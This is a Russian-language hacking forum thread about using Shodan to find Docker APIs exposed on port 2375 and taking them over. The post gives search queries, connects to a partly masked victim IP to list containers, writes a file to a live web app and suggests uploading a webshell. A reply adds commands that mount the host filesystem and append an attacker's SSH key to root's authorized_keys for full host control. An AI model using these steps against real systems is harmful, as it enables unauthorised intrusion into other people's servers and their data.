Статья Shodan : берём Docker на абордаж

[netcat]

Из цикла интересных статей с использованием Shodan. Данная статья будет короткой но информативной, что такое DockerAPI вы всегда можете прочитать в оффиц документаций..

I. Ищем синих китов

Используя Shodan делаем запрос

"Docker Containers:" port:2375

и получаем список доступных серверов по порту 2375

Дабы убрать дефолтные контейнеры прибегаем к запросу

"Docker Containers:" port:2375  -"ubuntu"

В итоге если обратиться по IP:2375 по вебу (http), получаем

{"message":"page not found"}

II. Коннектимся гарпуном..

Ставим докер на vps, и делаем коннект и командой ps смотрим лист доступных контейнеров

docker -H 4*.22*.**.**:2375 ps

проваливаемся

на примере одного IP адреса видим веб приложение

создаем файлик для теста

III. Выводы ?
А выводы такие: есть куда копать и есть чем заниматься для добычи материала.
на этом примере можно залить вебшелл и смотреть дальше.


Всем спасибо за внимание.

 

[kerberos]

Молоток как всегда!

ПС: Но я бы айпи потёр на картинке, не надо следить...

 

[corpserves]

все известно давно здесь

 

[nix_security]

Если доступен Docker API, то можно рутануть весь хост, а не просто один контейнер. И vps тут не нужен. Делаем например так:

docker -H tcp://x.x.x.x:2375 run  -it --rm -v /:/hostfs/  ubuntu sh
echo "СОДЕРЖИМОЕ id_rsa.pub" >> /hostfs/root/.ssh/authorized_keys

и спокойно идем по ssh с нашим ключем.

 

[g4lyfe]

может ли быть поиск в других конфиденциальных запросах?